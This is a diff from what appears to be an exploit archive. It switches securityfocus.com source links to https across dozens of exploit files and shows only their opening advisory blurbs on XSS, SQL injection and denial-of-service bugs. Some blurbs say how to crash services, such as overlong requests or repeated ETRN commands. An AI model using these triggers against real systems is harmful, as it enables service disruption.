@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37927/info +source: https://www.securityfocus.com/bid/37927/info Jetty is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/33596.txt b/exploits/jsp/webapps/33596.txt index e5385955a..c0075cf07 100644 --- a/exploits/jsp/webapps/33596.txt +++ b/exploits/jsp/webapps/33596.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38094/info +source: https://www.securityfocus.com/bid/38094/info KnowGate hipergate is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33675.txt b/exploits/jsp/webapps/33675.txt index ccf106060..ffa312d91 100644 --- a/exploits/jsp/webapps/33675.txt +++ b/exploits/jsp/webapps/33675.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38412/info +source: https://www.securityfocus.com/bid/38412/info Multiple IBM products are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33678.txt b/exploits/jsp/webapps/33678.txt index 96e906338..dc11910a1 100644 --- a/exploits/jsp/webapps/33678.txt +++ b/exploits/jsp/webapps/33678.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38441/info +source: https://www.securityfocus.com/bid/38441/info ARISg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33691.txt b/exploits/jsp/webapps/33691.txt index 5b64d142c..6c1e7820b 100644 --- a/exploits/jsp/webapps/33691.txt +++ b/exploits/jsp/webapps/33691.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38534/info +source: https://www.securityfocus.com/bid/38534/info Comptel Provisioning and Activation is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33779.txt b/exploits/jsp/webapps/33779.txt index 301f58208..98002e831 100644 --- a/exploits/jsp/webapps/33779.txt +++ b/exploits/jsp/webapps/33779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38879/info +source: https://www.securityfocus.com/bid/38879/info agXchange ESM is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/33785.txt b/exploits/jsp/webapps/33785.txt index c3306bf6d..6946ee920 100644 --- a/exploits/jsp/webapps/33785.txt +++ b/exploits/jsp/webapps/33785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38896/info +source: https://www.securityfocus.com/bid/38896/info agXchange ESM is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34092.txt b/exploits/jsp/webapps/34092.txt index 7f5eb0c66..5b8439113 100644 --- a/exploits/jsp/webapps/34092.txt +++ b/exploits/jsp/webapps/34092.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40600/info +source: https://www.securityfocus.com/bid/40600/info JForum is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/jsp/webapps/34179.txt b/exploits/jsp/webapps/34179.txt index 2e7b845b4..1aa8ccd54 100644 --- a/exploits/jsp/webapps/34179.txt +++ b/exploits/jsp/webapps/34179.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41030/info +source: https://www.securityfocus.com/bid/41030/info IBM WebSphere ILOG JRules is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34370.txt b/exploits/jsp/webapps/34370.txt index f6b7b6e48..f17567c60 100644 --- a/exploits/jsp/webapps/34370.txt +++ b/exploits/jsp/webapps/34370.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41925/info +source: https://www.securityfocus.com/bid/41925/info SAP Netweaver is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34384.txt b/exploits/jsp/webapps/34384.txt index 7b78a152d..c558c7aa7 100644 --- a/exploits/jsp/webapps/34384.txt +++ b/exploits/jsp/webapps/34384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42025/info +source: https://www.securityfocus.com/bid/42025/info Jira is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34440.txt b/exploits/jsp/webapps/34440.txt index e60c3ddbf..124f3f493 100644 --- a/exploits/jsp/webapps/34440.txt +++ b/exploits/jsp/webapps/34440.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42413/info +source: https://www.securityfocus.com/bid/42413/info Computer Associates Oneview Monitor is prone to a remote code-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/jsp/webapps/34834.txt b/exploits/jsp/webapps/34834.txt index 7846b83a3..4865edeff 100644 --- a/exploits/jsp/webapps/34834.txt +++ b/exploits/jsp/webapps/34834.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43954/info +source: https://www.securityfocus.com/bid/43954/info Oracle Fusion Middleware is prone to a cross-site scripting vulnerability in BPEL Console. diff --git a/exploits/jsp/webapps/35169.txt b/exploits/jsp/webapps/35169.txt index 9b0e03ce2..07a4a394f 100644 --- a/exploits/jsp/webapps/35169.txt +++ b/exploits/jsp/webapps/35169.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45682/info +source: https://www.securityfocus.com/bid/45682/info Openfire is prone to multiple cross-site-scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/jsp/webapps/35672.txt b/exploits/jsp/webapps/35672.txt index f7e8432a2..b23877729 100644 --- a/exploits/jsp/webapps/35672.txt +++ b/exploits/jsp/webapps/35672.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47607/info +source: https://www.securityfocus.com/bid/47607/info Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/jsp/webapps/35706.txt b/exploits/jsp/webapps/35706.txt index f8815d219..4ce6a6650 100644 --- a/exploits/jsp/webapps/35706.txt +++ b/exploits/jsp/webapps/35706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47728/info +source: https://www.securityfocus.com/bid/47728/info BMC Remedy Knowledge Management is prone to a default-account vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/35707.txt b/exploits/jsp/webapps/35707.txt index 08fb778ad..971fdc31f 100644 --- a/exploits/jsp/webapps/35707.txt +++ b/exploits/jsp/webapps/35707.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47731/info +source: https://www.securityfocus.com/bid/47731/info BMC Dashboards is prone to to multiple information-disclosure and cross-site scripting issues because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36275.txt b/exploits/jsp/webapps/36275.txt index 637f81b5f..0eedc592b 100644 --- a/exploits/jsp/webapps/36275.txt +++ b/exploits/jsp/webapps/36275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50456/info +source: https://www.securityfocus.com/bid/50456/info Hyperic HQ Enterprise is prone to a cross-site scripting vulnerability and multiple unspecified security vulnerabilities. diff --git a/exploits/jsp/webapps/36353.txt b/exploits/jsp/webapps/36353.txt index 2e43a77b6..a49e2c699 100644 --- a/exploits/jsp/webapps/36353.txt +++ b/exploits/jsp/webapps/36353.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36354.txt b/exploits/jsp/webapps/36354.txt index a23372f21..a1e6e469c 100644 --- a/exploits/jsp/webapps/36354.txt +++ b/exploits/jsp/webapps/36354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36355.txt b/exploits/jsp/webapps/36355.txt index d5704535f..7fe5fb45c 100644 --- a/exploits/jsp/webapps/36355.txt +++ b/exploits/jsp/webapps/36355.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36356.txt b/exploits/jsp/webapps/36356.txt index 3b1649d1e..043af7bfd 100644 --- a/exploits/jsp/webapps/36356.txt +++ b/exploits/jsp/webapps/36356.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36357.txt b/exploits/jsp/webapps/36357.txt index 48acb3d03..5b662c2fc 100644 --- a/exploits/jsp/webapps/36357.txt +++ b/exploits/jsp/webapps/36357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50806/info +source: https://www.securityfocus.com/bid/50806/info HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/36929.txt b/exploits/jsp/webapps/36929.txt index 0a3199796..4de3aa5d9 100644 --- a/exploits/jsp/webapps/36929.txt +++ b/exploits/jsp/webapps/36929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52356/info +source: https://www.securityfocus.com/bid/52356/info Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/37220.txt b/exploits/jsp/webapps/37220.txt index 5c6aa07cf..c16c2c3d2 100644 --- a/exploits/jsp/webapps/37220.txt +++ b/exploits/jsp/webapps/37220.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53602/info +source: https://www.securityfocus.com/bid/53602/info OpenKM is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/jsp/webapps/37221.txt b/exploits/jsp/webapps/37221.txt index b4ca3a5ef..586c82107 100644 --- a/exploits/jsp/webapps/37221.txt +++ b/exploits/jsp/webapps/37221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53603/info +source: https://www.securityfocus.com/bid/53603/info The FishEye and Crucible plugins for JIRA are prone to an unspecified security vulnerability because they fail to properly handle crafted XML data. diff --git a/exploits/jsp/webapps/37467.txt b/exploits/jsp/webapps/37467.txt index 9f4a885b9..0561669aa 100644 --- a/exploits/jsp/webapps/37467.txt +++ b/exploits/jsp/webapps/37467.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54235/info +source: https://www.securityfocus.com/bid/54235/info TEMENOS T24 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/37550.txt b/exploits/jsp/webapps/37550.txt index 068ffc6c8..4a0196488 100644 --- a/exploits/jsp/webapps/37550.txt +++ b/exploits/jsp/webapps/37550.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54733/info +source: https://www.securityfocus.com/bid/54733/info DataWatch Monarch Business Intelligence is prone to multiple input validation vulnerabilities. diff --git a/exploits/jsp/webapps/37802.html b/exploits/jsp/webapps/37802.html index 74716acc8..b9af7f234 100644 --- a/exploits/jsp/webapps/37802.html +++ b/exploits/jsp/webapps/37802.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55561/info +source: https://www.securityfocus.com/bid/55561/info IFOBS is prone to multiple HTML-injection vulnerabilities. diff --git a/exploits/jsp/webapps/38235.txt b/exploits/jsp/webapps/38235.txt index 698b32e86..52f4d4d25 100644 
--- a/exploits/jsp/webapps/38235.txt +++ b/exploits/jsp/webapps/38235.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57514/info +source: https://www.securityfocus.com/bid/57514/info Perforce P4Web is prone to multiple cross site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/webapps/38334.txt b/exploits/jsp/webapps/38334.txt index 4181f8bab..98d02d3ec 100644 --- a/exploits/jsp/webapps/38334.txt +++ b/exploits/jsp/webapps/38334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58164/info +source: https://www.securityfocus.com/bid/58164/info JForum is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/jsp/webapps/38460.txt b/exploits/jsp/webapps/38460.txt index 452fffedf..b9505d286 100644 --- a/exploits/jsp/webapps/38460.txt +++ b/exploits/jsp/webapps/38460.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59030/info +source: https://www.securityfocus.com/bid/59030/info jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/jsp/webapps/38816.html b/exploits/jsp/webapps/38816.html index 2a7cd628d..c24bddd2f 100644 --- a/exploits/jsp/webapps/38816.html +++ b/exploits/jsp/webapps/38816.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63363/info +source: https://www.securityfocus.com/bid/63363/info JReport is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/jsp/webapps/39142.txt b/exploits/jsp/webapps/39142.txt index e2417892d..99584ae02 100644 --- a/exploits/jsp/webapps/39142.txt +++ b/exploits/jsp/webapps/39142.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66817/info +source: https://www.securityfocus.com/bid/66817/info Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities. 
diff --git a/exploits/jsp/webapps/39143.txt b/exploits/jsp/webapps/39143.txt index aefaac0b0..c991f7a45 100644 --- a/exploits/jsp/webapps/39143.txt +++ b/exploits/jsp/webapps/39143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66817/info +source: https://www.securityfocus.com/bid/66817/info Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities. diff --git a/exploits/jsp/webapps/9887.txt b/exploits/jsp/webapps/9887.txt index 7749778d3..78e0b057e 100644 --- a/exploits/jsp/webapps/9887.txt +++ b/exploits/jsp/webapps/9887.txt @@ -387,9 +387,9 @@ IX. REFERENCES [4] Terminal Emulator Security Issues http://marc.info/?l=bugtraq&m=104612710031920&w=2 [5] Eterm Screen Dump Escape Sequence Local File Corruption Vulnerability - http://www.securityfocus.com/bid/6936/discuss + https://www.securityfocus.com/bid/6936/discuss [6] RXVT Screen Dump Escape Sequence Local File Corruption Vulnerability - http://www.securityfocus.com/bid/6938/discuss + https://www.securityfocus.com/bid/6938/discuss X. CREDIT diff --git a/exploits/linux/dos/14573.txt b/exploits/linux/dos/14573.txt index 6ae4d3d8e..5cbe1e8e8 100644 --- a/exploits/linux/dos/14573.txt +++ b/exploits/linux/dos/14573.txt @@ -1,4 +1,4 @@ -From: http://www.securityfocus.com/bid/41480/ +From: https://www.securityfocus.com/bid/41480/ LibTIFF is prone to a denial-of-service vulnerability because it fails to properly validate user-supplied input. An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. Due to the nature of this issue, attackers may be able to execute arbitrary code, but this has not been confirmed. diff --git a/exploits/linux/dos/15619.c b/exploits/linux/dos/15619.c index 7b474c2e3..4a6ddb60a 100644 --- a/exploits/linux/dos/15619.c +++ b/exploits/linux/dos/15619.c 
@@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/44301/info +// source: https://www.securityfocus.com/bid/44301/info /* known for over a year, fixed in grsec bug is due to a bad limit on the max size of the stack for 32bit apps on a 64bit OS. Instead of them being limited to 1/4th of a 32bit diff --git a/exploits/linux/dos/15732.txt b/exploits/linux/dos/15732.txt index 35621e593..87efc4ab0 100644 --- a/exploits/linux/dos/15732.txt +++ b/exploits/linux/dos/15732.txt @@ -1,4 +1,4 @@ -Source: http://www.securityfocus.com/bid/45162/info +Source: https://www.securityfocus.com/bid/45162/info FontForge is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/linux/dos/15974.txt b/exploits/linux/dos/15974.txt index 28c0030fe..8d981875c 100644 --- a/exploits/linux/dos/15974.txt +++ b/exploits/linux/dos/15974.txt @@ -1,5 +1,5 @@ Sources: https://www.chrishowie.com/2010/11/24/mutable-strings-in-mono/ -http://www.securityfocus.com/bid/45051/info +https://www.securityfocus.com/bid/45051/info Mono and Moonlight is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/dos/18225.c b/exploits/linux/dos/18225.c index fe2bc72e9..b4210def4 100644 --- a/exploits/linux/dos/18225.c +++ b/exploits/linux/dos/18225.c @@ -1,3 +1,4 @@ +/* ############################################################################ # Exploit Title: CSF Firewall Buffer overflow p0c # DownLoaD : http://www.configserver.com/free/csf.tgz @@ -10,6 +11,7 @@ ============================================================================== FiLe : CSF.c +*/ /* * Copyright 2006-2011, Way to the Web Limited diff --git a/exploits/linux/dos/19075.c b/exploits/linux/dos/19075.c index 9c91413e2..838113586 100644 --- a/exploits/linux/dos/19075.c +++ b/exploits/linux/dos/19075.c 
@@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/83/info +// source: https://www.securityfocus.com/bid/83/info // // APC PowerChute PLUS is a software package that will safely shutdown computer systems locally or accross a network when UPS power starts to fail. When operating PowerChute PLUS normally listens to TCP ports 6547 and 6548, as well as for broadcast requests in UDP port 6549. // diff --git a/exploits/linux/dos/19076.txt b/exploits/linux/dos/19076.txt index 750585fdc..11eda934e 100644 --- a/exploits/linux/dos/19076.txt +++ b/exploits/linux/dos/19076.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/84/info +source: https://www.securityfocus.com/bid/84/info There appears to be a buffer overflow in Apple's Personal Web Sharing 1.1. If you connect to its TCP port number 80 and send it a string over three thousand bytes long followed by two return characters Personal Web Sharing will stop servicing request. diff --git a/exploits/linux/dos/19082.txt b/exploits/linux/dos/19082.txt index 796b0c874..6f44ae803 100644 --- a/exploits/linux/dos/19082.txt +++ b/exploits/linux/dos/19082.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/105/info +source: https://www.securityfocus.com/bid/105/info A bug in Advance Micro Devices K6 processor allows non-privileged code to crash the machine. diff --git a/exploits/linux/dos/19085.c b/exploits/linux/dos/19085.c index b4e073755..4ba2f2c24 100644 --- a/exploits/linux/dos/19085.c +++ b/exploits/linux/dos/19085.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/111/info +source: https://www.securityfocus.com/bid/111/info A vulnerability in the Linux kernel allows any user to send a SIGIO signal to any process. If the process does not catch or ignore the signal is will exit. */ diff --git a/exploits/linux/dos/19103.c b/exploits/linux/dos/19103.c index 36c3924b6..a27daf440 100644 --- a/exploits/linux/dos/19103.c +++ b/exploits/linux/dos/19103.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/124/info +// source: https://www.securityfocus.com/bid/124/info The Teardrop denial of service attack exploits a flaw inherent to multiple vendor TCP/IP stacks. This problem is related to how the TCP/IP stack handle reassembly of fragmented IP packets. diff --git a/exploits/linux/dos/19241.c b/exploits/linux/dos/19241.c index 61e66a3d6..6818a1c40 100644 --- a/exploits/linux/dos/19241.c +++ b/exploits/linux/dos/19241.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/302/info +source: https://www.securityfocus.com/bid/302/info A vulnerability in the Linux Kernel's IPv4 option processing may allow a remote user to crash the system. diff --git a/exploits/linux/dos/19250.txt b/exploits/linux/dos/19250.txt index 32672fdd4..7867493ac 100644 --- a/exploits/linux/dos/19250.txt +++ b/exploits/linux/dos/19250.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/312/info +source: https://www.securityfocus.com/bid/312/info The autofs module provides support for the automount filesystem, as well as the interface between the kernel and the automountd daemon, which is responsible for the actual mounting. Calls such as chdir() executed in the automount directory are handled by the module, and if the desired directory is defined in the configuration files, automountd then mounts that directory/device. When a chdir() or similar function is called in the autofs directory, by a user doing something along the lines of "cd xxxx", the function fs/autofs/root.c:autofs_root_lookup() is called. diff --git a/exploits/linux/dos/19271.c b/exploits/linux/dos/19271.c index a10034afb..eb3fd1adb 100644 --- a/exploits/linux/dos/19271.c +++ b/exploits/linux/dos/19271.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/343/info +source: https://www.securityfocus.com/bid/343/info It is possible to leak kernel memory and render TCP ports above 1024 unusable, locked forever in the CLOSE_WAIT state in linux kernels prior to the late 2.1.x and 2.2.0pre releases. In addition to being intentionally exploited, unix applications compiled on linux that are multithreaded may also cause these problems. diff --git a/exploits/linux/dos/19272.txt b/exploits/linux/dos/19272.txt index 4a6feba2e..dd24edbdd 100644 --- a/exploits/linux/dos/19272.txt +++ b/exploits/linux/dos/19272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/344/info +source: https://www.securityfocus.com/bid/344/info Due to a rare and subtle bug in the 2.2.0 kernel, a linux machine can be forced to reboot by an unpriviliged local user. The reason for this is because of the invalid ELF core layout and the fact that munmap wipes out a vital page table entry. diff --git a/exploits/linux/dos/19282.c b/exploits/linux/dos/19282.c index fb15a370d..4bd23982f 100644 --- a/exploits/linux/dos/19282.c +++ b/exploits/linux/dos/19282.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/363/info +source: https://www.securityfocus.com/bid/363/info The 2.0.x kernels have a quirk in the TCP implementation that have to do with the accept() call returning after only a syn has been recieved (as opposed to the three way handshake having been completed). Sendmail, which is compiled on many unices, makes the assumption that the three way handshake has been completed and a tcp connection has been fully established. This trust in a standard tcp implementation is seen in the following section of code : */ diff --git a/exploits/linux/dos/19301.c b/exploits/linux/dos/19301.c index efefc293f..1700a0d49 100644 --- a/exploits/linux/dos/19301.c +++ b/exploits/linux/dos/19301.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/376/info +source: https://www.securityfocus.com/bid/376/info Linux kernel 2.0.33 is vulnerable to a denial of service attack related to overlapping IP fragments. The bug is not in the handling of them itself, but the action taken when an oversized packet is recieved. A printk function is called containing a variable without any sort of wrapping or protection in function ip_glue. The consequences of this are a serious remote denial of service [ie, reboot of machine]. */ diff --git a/exploits/linux/dos/19308.c b/exploits/linux/dos/19308.c index 3c44256a0..39c437394 100644 --- a/exploits/linux/dos/19308.c +++ b/exploits/linux/dos/19308.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/388/info +source: https://www.securityfocus.com/bid/388/info The i_count member in the Linux inode structure is an unsigned short integer. It can be overflowed by mapping a single file too many times, allowing for a local user to possibly gain root access on the target machine or cause a denial of service. diff --git a/exploits/linux/dos/19463.c b/exploits/linux/dos/19463.c index cdabe86cb..7484b1be5 100644 --- a/exploits/linux/dos/19463.c +++ b/exploits/linux/dos/19463.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/587/info +// source: https://www.securityfocus.com/bid/587/info In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt. 
diff --git a/exploits/linux/dos/19675.c b/exploits/linux/dos/19675.c index f325d9c3a..3fa392774 100644 --- a/exploits/linux/dos/19675.c +++ b/exploits/linux/dos/19675.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/870/info +source: https://www.securityfocus.com/bid/870/info Debian 2.1,Linux kernel 2.0.34/2.0.35/2.0.36/2.0.37/2.0.38,RedHat 5.2 i386 Packet Length with Options Vulnerability diff --git a/exploits/linux/dos/19701.sh b/exploits/linux/dos/19701.sh index 8b13d96b8..e5843d893 100755 --- a/exploits/linux/dos/19701.sh +++ b/exploits/linux/dos/19701.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/904/info +source: https://www.securityfocus.com/bid/904/info There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server. diff --git a/exploits/linux/dos/19818.c b/exploits/linux/dos/19818.c index bc45ee591..f07a1bdf1 100644 --- a/exploits/linux/dos/19818.c +++ b/exploits/linux/dos/19818.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1072/info +source: https://www.securityfocus.com/bid/1072/info A denial of service exists in Linux kernels, as related to Unix domain sockets ignoring limits as set in /proc/sys/net/core/wmem_max. By creating successive Unix domain sockets, it is possible to cause a denial of service in some versions of the Linux kernel. Versions 2.2.12, 2.2.14, and 2.3.99-pre2 have all been confirmed as being vulnerable. Previous kernel versions are most likely vulnerable. */ diff --git a/exploits/linux/dos/19850.c b/exploits/linux/dos/19850.c index e08b3c5b0..0279504a6 100644 --- a/exploits/linux/dos/19850.c +++ b/exploits/linux/dos/19850.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1111/info +// source: https://www.securityfocus.com/bid/1111/info A denial of service exists in the X11 font server shipped with RedHat Linux 6.x. Due to improper input validation, it is possible for any user to crash the X fontserver. This will prevent the X server from functioning properly. diff --git a/exploits/linux/dos/19869.txt b/exploits/linux/dos/19869.txt index a39203430..7d031e1c5 100644 --- a/exploits/linux/dos/19869.txt +++ b/exploits/linux/dos/19869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1132/info +source: https://www.securityfocus.com/bid/1132/info Vulnerabilities exist in a number of pop3 daemon implementations, having to do with their creation of lock files. Affected include Qualcomm's qpopper, and the popd included as part of the imap-4 rpm from RedHat. Lockfiles in both implementation are created with consistent local file names; the RedHat popd in /tmp, with a fairly random name (albeit consistent for a given user), and in the mail spool directory, with the user name prepended by a "." and appended with ".pop". Creation of either of these files will prevent the popd user from being able to establish a connection to retrieve their mail. diff --git a/exploits/linux/dos/19870.pl b/exploits/linux/dos/19870.pl index 942efbea9..299a5e080 100755 --- a/exploits/linux/dos/19870.pl +++ b/exploits/linux/dos/19870.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1136/info +source: https://www.securityfocus.com/bid/1136/info CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken. diff --git a/exploits/linux/dos/19950.c b/exploits/linux/dos/19950.c index 25a01dfc9..e99ae19f7 100644 --- a/exploits/linux/dos/19950.c +++ b/exploits/linux/dos/19950.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/1235/info +source: https://www.securityfocus.com/bid/1235/info A denial of service exists in XFree86 3.3.5, 3.3.6 and 4.0. A remote user can send a malformed packet to the TCP listening port, 6000, which will cause the X server to be unresponsive for some period of time. During this time, the keyboard will not respond to user input, and in some cases, the mouse will also not respond. During this time period, the X server will utilize 100% of the CPU, and can only be repaired by being signaled. This vulnerability exists only in servers compiled with the XCSECURITY #define set. This can be verified by running the following: strings /path/to/XF86_SVGA | grep "XC-QUERY-SECURITY-1" diff --git a/exploits/linux/dos/20023.c b/exploits/linux/dos/20023.c index 6def8fb93..89b7e722f 100644 --- a/exploits/linux/dos/20023.c +++ b/exploits/linux/dos/20023.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1369/info +// source: https://www.securityfocus.com/bid/1369/info A denial of service vulnerability exists in libICE, part of the X11 windowing system. Any libICE application which creates inet listening sockets can be remotely crashed. This is due to a bug in the handling of the SKIP_STRING macro. By supplying a large value for the skip value, it is possible to cause a pointer to point to uninitialized memory. This in turn will cause a segfault. diff --git a/exploits/linux/dos/20025.txt b/exploits/linux/dos/20025.txt index fd1c7566a..caff26400 100644 --- a/exploits/linux/dos/20025.txt +++ b/exploits/linux/dos/20025.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1372/info +source: https://www.securityfocus.com/bid/1372/info A denial of service attack exists in the NFS lock daemon supplied with Linux. By connecting to the port rpc.lockd is running on, and supplying random input, it will cause lockd to exit with an error. The socket associated with rpc.lockd is also not properly released, and cannot be rebound to without a reboot. diff --git a/exploits/linux/dos/20026.c b/exploits/linux/dos/20026.c index 657dc2f9d..33d2a9da5 100644 --- a/exploits/linux/dos/20026.c +++ b/exploits/linux/dos/20026.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1377/info +// source: https://www.securityfocus.com/bid/1377/info gpm is a program that allows Linux users to use the mouse in virtual consoles. It communicates with a device, /dev/gpmctl, via unix domain STREAM sockets and is vulnerable to a locally exploitable denial of service attack. If a malicious user makes too many connections to the device, it will hang and gpm will not function. RedHat 6.1 is confirmed to be vulnerable. It is not known what other linux distributions may also be vulnerable. diff --git a/exploits/linux/dos/20217.txt b/exploits/linux/dos/20217.txt index 85bd7abcf..c3590c5f1 100644 --- a/exploits/linux/dos/20217.txt 
